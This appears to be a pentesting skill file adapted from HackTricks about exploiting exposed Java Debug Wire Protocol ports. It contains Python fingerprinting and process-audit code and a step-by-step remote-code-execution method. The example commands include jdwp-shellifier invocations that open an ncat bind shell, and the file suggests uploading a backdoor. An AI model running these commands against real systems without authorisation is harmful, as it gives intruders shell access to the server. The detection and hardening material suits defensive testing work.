Hacktricks-skills pentest-jdwp-exploitation

Exploit exposed Java Debug Wire Protocol (JDWP) services for remote code execution. Use this skill whenever you need to test JDWP vulnerabilities, enumerate Java debug services, or gain access to Java applications with debug ports exposed. Trigger on mentions of JDWP, Java debug ports, port 8000, Java application security testing, or debugging protocol exploitation.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol/SKILL.MD
source content

JDWP Exploitation Skill

Overview

The Java Debug Wire Protocol (JDWP) is the packet-based binary network protocol through which a debugger controls a Java virtual machine. It has no authentication or encryption, so a JVM whose debug agent listens on a network-reachable socket hands full debugger control (method invocation, class loading, memory inspection) to anyone who connects, which amounts to remote code execution as the JVM's user.

When to Use This Skill

  • Testing Java applications with exposed debug ports
  • Enumerating JDWP services on target networks
  • Gaining access to Java applications with debug functionality enabled
  • Security assessments involving Java infrastructure
  • Investigating suspicious Java processes with debug capabilities

Detection

Port Scanning

JDWP listeners commonly use port 8000 (the default in Tomcat's JPDA start-up script), with 5005 (the usual IDE and build-tool default) and 8787 (JBoss/WildFly) also frequent, but any port is possible. Scan those plus any custom ports configured in the target environment. Nmap's service detection recognises the JDWP handshake, and its jdwp-version NSE script reports the VM version strings once a service is found.

Handshake Fingerprinting

Connect to the port and send the 14-byte ASCII string "JDWP-Handshake". A JDWP service replies with exactly the same 14 bytes; any other reply, or none, means the port is something else. Because the handshake carries no credentials, a successful echo already proves that anyone who can reach the port can attach a debugger.

Process Detection

Search the command lines of running Java processes (for example with ps or pgrep) for the debug-agent options "-agentlib:jdwp=..." or the older "-Xrunjdwp:..." (the option name is jdwp, not "jdwk"). Inside those options, server=y means the JVM is the listening side and address= shows the interface and port it listens on.
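An added example (Python, not from the original page) of the process check: it pulls the debug-agent options out of process command lines and classifies where the listener is bound, which is the question a pentester or defender actually needs answered. The ps-style lines are constructed for the offline run, the /proc reader is Linux-specific, and the jdk_major rule (a bare port such as address=8000 binds every interface on JDK 8 and earlier but only loopback from JDK 9 onward) is an assumption stated in the code.

```python
import glob
import re

# Debug-agent syntaxes the JVM accepts on the command line:
#   -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:8000
#   -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000   (legacy spelling)
JDWP_OPT = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)(\S+)")

LOOPBACK = {"localhost", "127.0.0.1", "::1"}
WILDCARD = {"*", "0.0.0.0", "::", ""}


def parse_jdwp_options(cmdline):
    """Return the agent's key=value options as a dict, or None if there is no JDWP agent."""
    m = JDWP_OPT.search(cmdline)
    if not m:
        return None
    opts = {}
    for item in m.group(1).split(","):
        key, _, value = item.partition("=")
        opts[key] = value
    return opts


def listener_exposure(opts, jdk_major):
    """Classify where the debug listener is reachable from.

    'not-listening'  server=n: the JVM dials out to a debugger, nothing to connect to
    'shared-memory'  dt_shmem transport, same Windows host only
    'loopback'       only processes on the same host can attach
    'all-interfaces' anyone who can reach the host can attach
    'interface:<ip>' bound to one specific address
    Assumption (jdk_major): a bare port binds every interface on JDK 8 and earlier,
    but loopback only on JDK 9 and later.
    """
    if opts.get("server", "n") != "y":
        return "not-listening"
    if opts.get("transport", "dt_socket") != "dt_socket":
        return "shared-memory"
    addr = opts.get("address", "")
    if ":" not in addr:  # bare port or empty: the JVM picks the bind address
        return "loopback" if jdk_major >= 9 else "all-interfaces"
    host = addr.rsplit(":", 1)[0].strip("[]")
    if host in WILDCARD:
        return "all-interfaces"
    if host in LOOPBACK:
        return "loopback"
    return "interface:" + host


def audit(ps_lines, jdk_major=11):
    """ps_lines are 'PID COMMAND' strings. Returns (pid, exposure, address) per JDWP process."""
    found = []
    for line in ps_lines:
        pid, _, cmd = line.strip().partition(" ")
        opts = parse_jdwp_options(cmd)
        if opts is not None:
            found.append((int(pid), listener_exposure(opts, jdk_major), opts.get("address", "")))
    return found


def proc_cmdlines():
    """Linux only: read every process command line from /proc (arguments are NUL separated)."""
    lines = []
    for path in glob.glob("/proc/[0-9]*/cmdline"):
        try:
            with open(path, "rb") as f:
                raw = f.read()
        except OSError:
            continue
        if raw:
            lines.append(path.split("/")[2] + " " + raw.replace(b"\0", b" ").decode("utf-8", "replace"))
    return lines


# Constructed ps-style output for the offline run; not taken from a real host.
SAMPLE_PS = [
    "1234 java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:8000 -jar app.jar",
    "2345 java -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar legacy.jar",
    "3456 java -agentlib:jdwp=transport=dt_socket,server=y,address=127.0.0.1:5005 -jar dev.jar",
    "4567 java -agentlib:jdwp=transport=dt_socket,server=n,address=10.0.0.5:8000 -jar attach.jar",
    "5678 java -jar clean.jar",
]

if __name__ == "__main__":
    import sys
    lines = proc_cmdlines() if "--live" in sys.argv else SAMPLE_PS
    for pid, exposure, addr in audit(lines):
        print(f"pid {pid}: jdwp address={addr or '(default)'} -> {exposure}")
```

Run it with --live on a Linux host to audit real processes; without the flag it walks the constructed sample. Pass the host's JDK major version to audit() when a process uses a bare port, since that is the one case where the bind address depends on the JDK rather than on the option string.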

Exploitation

Primary Tool: jdwp-shellifier

The recommended exploitation tool is jdwp-shellifier.

Basic Usage

# Obtain internal data from the target
./jdwp-shellifier.py -t <target-ip> -p <port>

# Execute a command on the target
./jdwp-shellifier.py -t <target-ip> -p <port> --cmd '<command>'

# Use a specific breakpoint for more stable exploitation
./jdwp-shellifier.py -t <target-ip> -p <port> --break-on 'java.lang.String.indexOf' --cmd '<command>'

Stability Tips

  1. Use --break-on 'java.lang.String.indexOf' for more stable exploitation instead of the default java.net.ServerSocket.accept: the command only runs once a thread hits the breakpoint, and String.indexOf is called constantly by almost any Java program, whereas ServerSocket.accept is reached only when the application handles a new connection
  2. If possible, upload and execute a backdoor instead of running commands directly for even greater stability
  3. The exploit works across various JDK versions and is platform-independent, because it relies only on standard JDWP commands and java.lang.Runtime

Example Commands

# Basic reconnaissance
./jdwp-shellifier.py -t 192.168.2.9 -p 8000

# Bind shell via ncat: the target listens on 1337, connect to it afterwards with 'ncat <target-ip> 1337'
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash'

# Stable exploitation with custom breakpoint
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash'

Protocol Details

JDWP Handshake

  • 14-character ASCII string: "JDWP-Handshake"
  • Exchanged between Debugger (the connecting client) and Debuggee (the JVM): the debugger sends it first and the JVM echoes it back byte for byte
  • Used to initiate communication and confirm service presence; no credentials are involved, so completing the handshake is the whole of access control

Message Structure

Every packet after the handshake starts with an 11-byte big-endian header:

  • Length field (4 bytes): total packet size, header included
  • Id field (4 bytes): chosen by the sender; a reply carries the id of the command it answers
  • Flag field (1 byte): 0x80 marks a reply packet, 0x00 a command packet
  • CommandSet field (1 byte) followed by a Command field (1 byte) in a command packet; in a reply these two bytes are instead a 16-bit error code (0 = success). Command sets 0 to 63 are commands sent to the target VM (for example VirtualMachine = 1, ObjectReference = 9, EventRequest = 15), 64 to 127 are sent to the debugger (Event = 64 carries breakpoint and other events), and 128 and above are vendor-defined
  • Any command-specific data follows the header
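A minimal scanner that performs the handshake and then sends the VirtualMachine.Version command to read the JVM's version strings, added here as an example (Python; not part of the original page or of jdwp-shellifier) to show both the fingerprinting step from the Detection section and the packet layout described above. It assumes nothing about the target beyond the JDWP specification; the sample reply at the bottom is constructed, not captured, so the parser can be exercised offline.

```python
import socket
import struct
import sys

HANDSHAKE = b"JDWP-Handshake"  # 14 ASCII bytes; the debugger sends it, the debuggee echoes it

# Common header of every JDWP packet (big-endian): length(4) id(4) flags(1), then
# commandset(1) command(1) in a command packet, or errorcode(2) in a reply packet.
HEADER_LEN = 11
REPLY_FLAG = 0x80

# VirtualMachine command set (1), Version command (1), from the JDWP spec.
VM_CMDSET = 1
VM_VERSION = 1


def build_command(pkt_id, cmdset, cmd, data=b""):
    """Encode a command packet; the length field counts the 11-byte header too."""
    return struct.pack(">IIBBB", HEADER_LEN + len(data), pkt_id, 0, cmdset, cmd) + data


def parse_packet(buf):
    """Decode one command or reply packet from raw bytes."""
    if len(buf) < HEADER_LEN:
        raise ValueError("packet shorter than JDWP header")
    length, pkt_id, flags = struct.unpack(">IIB", buf[:9])
    if length < HEADER_LEN or length > len(buf):
        raise ValueError("bad length field %d" % length)
    pkt = {"id": pkt_id, "reply": bool(flags & REPLY_FLAG), "data": buf[HEADER_LEN:length]}
    if pkt["reply"]:
        (pkt["error"],) = struct.unpack(">H", buf[9:11])
    else:
        pkt["cmdset"], pkt["cmd"] = struct.unpack(">BB", buf[9:11])
    return pkt


def read_string(data, off):
    """JDWP string: 4-byte length followed by UTF-8 bytes, no terminator."""
    (n,) = struct.unpack(">I", data[off:off + 4])
    return data[off + 4:off + 4 + n].decode("utf-8", "replace"), off + 4 + n


def encode_string(s):
    b = s.encode("utf-8")
    return struct.pack(">I", len(b)) + b


def parse_version_reply(data):
    """VirtualMachine.Version reply body: description, jdwpMajor, jdwpMinor, vmVersion, vmName."""
    desc, off = read_string(data, 0)
    major, minor = struct.unpack(">ii", data[off:off + 8])
    vm_version, off = read_string(data, off + 8)
    vm_name, off = read_string(data, off)
    return {"description": desc, "jdwp_major": major, "jdwp_minor": minor,
            "vm_version": vm_version, "vm_name": vm_name}


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def fingerprint(host, port, timeout=3.0):
    """Handshake, then ask VirtualMachine.Version. Returns the parsed reply, or None
    if the port did not echo the handshake (so it is not JDWP)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(HANDSHAKE)
        if recv_exact(s, len(HANDSHAKE)) != HANDSHAKE:
            return None
        s.sendall(build_command(1, VM_CMDSET, VM_VERSION))
        while True:
            header = recv_exact(s, HEADER_LEN)
            length = struct.unpack(">I", header[:4])[0]
            pkt = parse_packet(header + recv_exact(s, length - HEADER_LEN))
            # The VM may push unsolicited Event packets (command set 64) first; skip them.
            if pkt["reply"] and pkt["id"] == 1:
                break
        if pkt["error"] != 0:
            raise RuntimeError("Version command failed with error %d" % pkt["error"])
        return parse_version_reply(pkt["data"])


# Constructed reply, not captured from a real VM, so the parser can be checked offline.
SAMPLE_VERSION_BODY = (encode_string("Java Debug Wire Protocol (Reference Implementation) version 1.8")
                       + struct.pack(">ii", 1, 8)
                       + encode_string("1.8.0_292")
                       + encode_string("OpenJDK 64-Bit Server VM"))
SAMPLE_VERSION_REPLY = (struct.pack(">IIBH", HEADER_LEN + len(SAMPLE_VERSION_BODY), 1, REPLY_FLAG, 0)
                        + SAMPLE_VERSION_BODY)

if __name__ == "__main__":
    info = fingerprint(sys.argv[1], int(sys.argv[2]))
    print("not JDWP" if info is None else
          "JDWP %(jdwp_major)d.%(jdwp_minor)d on %(vm_name)s %(vm_version)s" % info)
```

Run as "python3 jdwp_fp.py <target-ip> <port>". Reading replies by id rather than assuming the first packet back is the answer matters in practice: a JVM can emit Event packets of its own at any time, and a scanner that treats one of those as the Version reply will mis-parse it.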

Exploitation Process

  1. Fetch Java Runtime references: after the handshake, enumerate loaded classes (VirtualMachine.AllClasses or ClassesBySignature) to locate java.lang.Runtime and the IDs of its getRuntime and exec methods
  2. Set breakpoints on target methods: register a breakpoint (EventRequest.Set) on a method the application executes on its own, such as java.net.ServerSocket.accept or java.lang.String.indexOf, and wait for the Event packet that reports a thread suspended there; method invocation is only possible from a suspended thread
  3. Invoke arbitrary methods: using that thread, call Runtime.getRuntime() (ClassType.InvokeMethod) and then exec on the returned object (ObjectReference.InvokeMethod), passing a command string created with VirtualMachine.CreateString
  4. Execute commands or load malicious classes: the exec call runs the operating-system command as the JVM's user, and the same invocation primitives can be used to load attacker-supplied classes; jdwp-shellifier automates the command-execution path

Security Considerations

  • JDWP has no authentication or encryption by design; completing the 14-byte handshake is all it takes to obtain full debugger control of the JVM, which is equivalent to code execution as the JVM's user
  • Debug agents should never be enabled on production JVMs or on any JVM reachable from hostile networks
  • Regular security reviews should check JVM start-up options (-agentlib:jdwp, -Xrunjdwp, and wrappers such as Tomcat's JPDA_OPTS) and remove debug flags from production deployments
  • Where a debugger is genuinely needed, bind it to loopback explicitly (address=127.0.0.1:<port>) and reach it through an SSH tunnel; a bare port such as address=8000 listens on all interfaces on JDK 8 and earlier and only on loopback from JDK 9 onward, so do not rely on the default
  • Firewall rules and network segmentation must block the debug port from untrusted networks
  • Monitor for JDWP services on internet-facing systems using Shodan or similar tools, and scan your own ranges with the handshake check
